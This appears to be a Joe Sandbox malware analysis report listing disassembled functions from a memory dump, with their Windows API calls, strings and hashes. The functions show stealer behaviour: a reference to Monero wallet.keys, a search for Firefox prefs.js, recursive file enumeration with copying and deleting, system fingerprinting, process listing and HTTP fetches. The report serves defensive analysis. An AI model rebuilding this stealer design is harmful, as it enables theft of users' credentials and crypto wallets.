Instruction Fuzzy Hash: C9519BB1900118ABCF25EBB0DC85EEE773CBF55300F408588B61A93040DB749B89CFA4

Function 0018F4F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A155C,001A0D7E), ref: 0018F55E
StrCmpCA.SHLWAPI(?,001A1560), ref: 0018F5AF
StrCmpCA.SHLWAPI(?,001A1564), ref: 0018F5C5
FindNextFileA.KERNELBASE(000000FF,?), ref: 0018F8F1
FindClose.KERNEL32(000000FF), ref: 0018F903

Strings

prefs.js, xrefs: 0018F652

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 49dd92c9a1f71c6bedbac9038de3dfc60cbd5dcf40ecd1bb512eae46d1b5fde2
Instruction ID: a9408ead7a71707be6b81a1d1b5708fb8e97c49f9280374b59996855ec659a63
Opcode Fuzzy Hash: 49dd92c9a1f71c6bedbac9038de3dfc60cbd5dcf40ecd1bb512eae46d1b5fde2
Instruction Fuzzy Hash: 90B10E719002189BCF24FF64DC96AEE7779AFA5300F8085A8A80A57151EF716B4DCFD2

Function 00181710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A500C,?,?,?,001A50B4,?,?,00000000,?,00000000), ref: 00181963
StrCmpCA.SHLWAPI(?,001A515C), ref: 001819B3
StrCmpCA.SHLWAPI(?,001A5204), ref: 001819C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00181D80
DeleteFileA.KERNEL32(00000000), ref: 00181E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00181E60
FindClose.KERNEL32(000000FF), ref: 00181E72

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Strings

\*.*, xrefs: 00181831

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: d177ccd244b2114066173bfcf458c791e5f25fc7a9ec6dd7c45afa2015e24b8a
Instruction ID: 3338157467f7b29f6dec599438af84d3750a0b9070c0c89abae0152f93b4dee3
Opcode Fuzzy Hash: d177ccd244b2114066173bfcf458c791e5f25fc7a9ec6dd7c45afa2015e24b8a
Instruction Fuzzy Hash: 4F12BF71910118ABCF19FB60DC96AEE737DAF65300F8045A9B50A62091EF706B8DCFD2

Function 0018D8C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A1454,001A0B96), ref: 0018D92B
StrCmpCA.SHLWAPI(?,001A1458), ref: 0018D973
StrCmpCA.SHLWAPI(?,001A145C), ref: 0018D989
FindNextFileA.KERNELBASE(000000FF,?), ref: 0018DC0C
FindClose.KERNEL32(000000FF), ref: 0018DC1E

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: ca2b8d7cfe61138feee17704d5daf0b992058dd8a1dcdffc470e0fc55302c434
Instruction ID: 97616ef2a69815fedc7d183493085600e443dbb6b2bca040681f7e43d032c880
Opcode Fuzzy Hash: ca2b8d7cfe61138feee17704d5daf0b992058dd8a1dcdffc470e0fc55302c434
Instruction Fuzzy Hash: CC910E72900204AACF14FB74EC96DED777DAFA5300F408668F90A96591EF349B5C8BD2

Function 00197630 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

GetKeyboardLayoutList.USER32(00000000,00000000,001A059F), ref: 00197681
LocalAlloc.KERNEL32(00000040,?), ref: 00197699
GetKeyboardLayoutList.USER32(?,00000000), ref: 001976AD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00197702
LocalFree.KERNEL32(00000000), ref: 001977C2

Strings

/ , xrefs: 0019771F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: ccef6bfc26b0a5115b5aaea25c9c5b6a562da04221a4d1ac3ef2a9807b41f6e0
Instruction ID: 444ebbfabfb321d50658095ec135d82fcaf262b0ed1eb8bf2dd8ada4fc777d25
Opcode Fuzzy Hash: ccef6bfc26b0a5115b5aaea25c9c5b6a562da04221a4d1ac3ef2a9807b41f6e0
Instruction Fuzzy Hash: 4E415C71950218ABCF24DB94DC99FEEB778FF58700F604199E10AA6191DB742F88CFA1

Function 00185000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018501A
RtlAllocateHeap.NTDLL(00000000), ref: 00185021
InternetOpenA.WININET(001A0DC7,00000000,00000000,00000000,00000000), ref: 0018503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00185061
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00185091
InternetCloseHandle.WININET(?), ref: 00185109
InternetCloseHandle.WININET(?), ref: 00185116

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 4a9e6c93a91f07086a760d5cbcfa3696a09f615b823ec084816e06c597c8b398
Instruction ID: 85a2047ca5ebfb1c338699f35bc387e9b1e3b8315ad22421b2c20eb8932a1d05
Opcode Fuzzy Hash: 4a9e6c93a91f07086a760d5cbcfa3696a09f615b823ec084816e06c597c8b398
Instruction Fuzzy Hash: C93109B5A00218ABDB24DF54CC85BDDB7B9FB48304F5081D9FA09A7281D7B06EC58F98

Function 0018E270 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001A0C1F), ref: 0018E2E2
StrCmpCA.SHLWAPI(?,001A149C), ref: 0018E332
StrCmpCA.SHLWAPI(?,001A14A0), ref: 0018E348
FindNextFileA.KERNEL32(000000FF,?), ref: 0018EA1F

Strings

\*.*, xrefs: 0018E28D

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: daeee0fa3580baf31801feca02eb4eb5c510dfc6881304b1cc35064fda9734de
Instruction ID: 3e31b372b50e7826dffe28d59370e92f4cc060be0dd48de78ca8854353271ffe
Opcode Fuzzy Hash: daeee0fa3580baf31801feca02eb4eb5c510dfc6881304b1cc35064fda9734de
Instruction Fuzzy Hash: 2412ED72910118AACF19FB64DC96EED7379AF65300F8045A9B50A520A1EF746F4CCFE2

Function 001990A0 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001990BE
Process32First.KERNEL32(001A0AB3,00000128), ref: 001990D2
Process32Next.KERNEL32(001A0AB3,00000128), ref: 001990E7
StrCmpCA.SHLWAPI(?,00000000), ref: 001990FC
CloseHandle.KERNEL32(001A0AB3), ref: 0019911A

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7d673901a6ff1ce3ef2179760c695b0bd521c23de2ac523be7a527070ae66cca
Instruction ID: 4e269bbab0df7d9f9f9898028f18e638a25c6fae7285c4bbd488a810a00476bf
Opcode Fuzzy Hash: 7d673901a6ff1ce3ef2179760c695b0bd521c23de2ac523be7a527070ae66cca
Instruction Fuzzy Hash: 2D010C75A10208EBDF25DFA4DD89BDEBBF8BB09710F104198A50A97240DB719A44DF50

Function 001974D0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000), ref: 00197503
RtlAllocateHeap.NTDLL(00000000), ref: 0019750A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000,?), ref: 0019751D
wsprintfA.USER32 ref: 00197557

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
